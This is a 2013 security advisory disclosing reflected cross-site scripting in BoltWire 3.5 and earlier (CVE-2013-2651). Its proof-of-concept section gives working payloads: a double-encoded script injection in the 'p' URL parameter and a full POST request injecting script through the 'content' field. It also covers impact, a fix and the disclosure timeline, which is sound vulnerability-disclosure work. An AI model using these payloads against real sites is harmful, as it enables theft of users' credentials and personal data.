BoltWire 3.5 Cross Site Scripting

`=============================================  
INTERNET SECURITY AUDITORS ALERT 2013-010  
- Original release date: March 20th, 2013  
- Last revised: March 25th, 2013  
- Discovered by: Manuel Garcia Cardenas  
- Severity: 4,8/10 (CVSS Base Score)  
- CVE-ID: CVE-2013-2651  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Multiple Reflected XSS vulnerabilities in BoltWire <= v3.5  
  
II. BACKGROUND  
-------------------------  
BoltWire is an easy to use web development engine with surprizing  
flexibility and power. It has  
  
the various strengths of a wiki, cms, database, search engine, and more,  
all rolled together into  
  
a software system of ground-breaking design.  
  
III. DESCRIPTION  
-------------------------  
Has been detected a reflected XSS vulnerability in BoltWire <=3.5 , that  
allows the execution of  
  
arbitrary HTML/script code to be executed in the context of the victim  
user's browser.  
  
The code injection is done through the parameter "p" and "content" in  
the page index.php.  
  
IV. PROOF OF CONCEPT  
-------------------------  
The application does not validate the double encoding of the "p" parameter.  
  
Malicious Request ("p" parameter):  
  
Not vulnerable:  
http://vulnerablesite.com/boltwire/index.php?p=<script>alert("XSS")</script>  
Not Vulnerable:  
http://vulnerablesite.com/boltwire/index.php?p=%3cscript%3ealert%28%22XSS  
  
%22%29%3c%2fscript%3e  
Vulnerable:  
http://vulnerablesite.com/boltwire/index.php?p=%253cscript%253ealert%2528%2522XSS  
  
%2522%2529%253c%252fscript%253e  
  
Malicious Request ("content" parameter):  
  
POST /bolt/field/index.php?p=action.create HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101  
Firefox/19.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Cookie: PHPSESSID=bf1bcm8370oqt84lh8nvrdklb7;  
BOLTsession=bf1bcm8370oqt84lh8nvrdklb7  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 121  
  
target=example&content=</textarea><script>alert("XSS")</script>&submit=PREVIEW>  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in a targeted  
user's browser, this can  
  
leverage to steal sensitive information as user credentials, personal  
data, etc.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
All Versions of BoltWire <= v3.5  
  
VII. SOLUTION  
-------------------------  
All data received by the application and can be modified by the user,  
before making any kind of  
  
transaction with them must be validated.  
  
VIII. REFERENCES  
-------------------------  
http://www.boltwire.com  
http://www.isecauditors.com  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered  
by Manuel García Cárdenas (mgarcia (at) isecauditors (dot) com).  
  
X. REVISION HISTORY  
------------------------  
March 20, 2013 1: Initial release  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
March 20, 2013: Vulnerability acquired by  
Internet Security Auditors (www.isecauditors.com)  
March 25, 2013: Sent to Devel Team.  
October 09, 2013: After some months without feedback, we do a  
full-disclosure  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is" with  
no warranties or  
  
guarantees of fitness of use or otherwise.  
Internet Security Auditors accepts no responsibility for any damage  
caused by the use or misuse  
  
of this information.  
  
XIII. ABOUT  
-------------------------  
Internet Security Auditors is a Spain based leader in web application  
testing, network security,  
  
penetration testing, security compliance implementation and assessing.  
Our clients include some  
  
of the largest companies in areas such as finance, telecommunications,  
insurance, ITC, etc.  
We are vendor independent provider with a deep expertise since 2001. Our  
efforts in R&D include  
  
vulnerability research, open security project collaboration and  
whitepapers, presentations and  
  
security events participation and promotion. For further information  
regarding our security  
  
services, contact us.  
  
XIV. FOLLOW US  
-------------------------  
You can follow Internet Security Auditors, news and security advisories at:  
https://www.facebook.com/ISecAuditors  
https://twitter.com/ISecAuditors  
http://www.linkedin.com/company/internet-security-auditors  
http://www.youtube.com/user/ISecAuditors  
`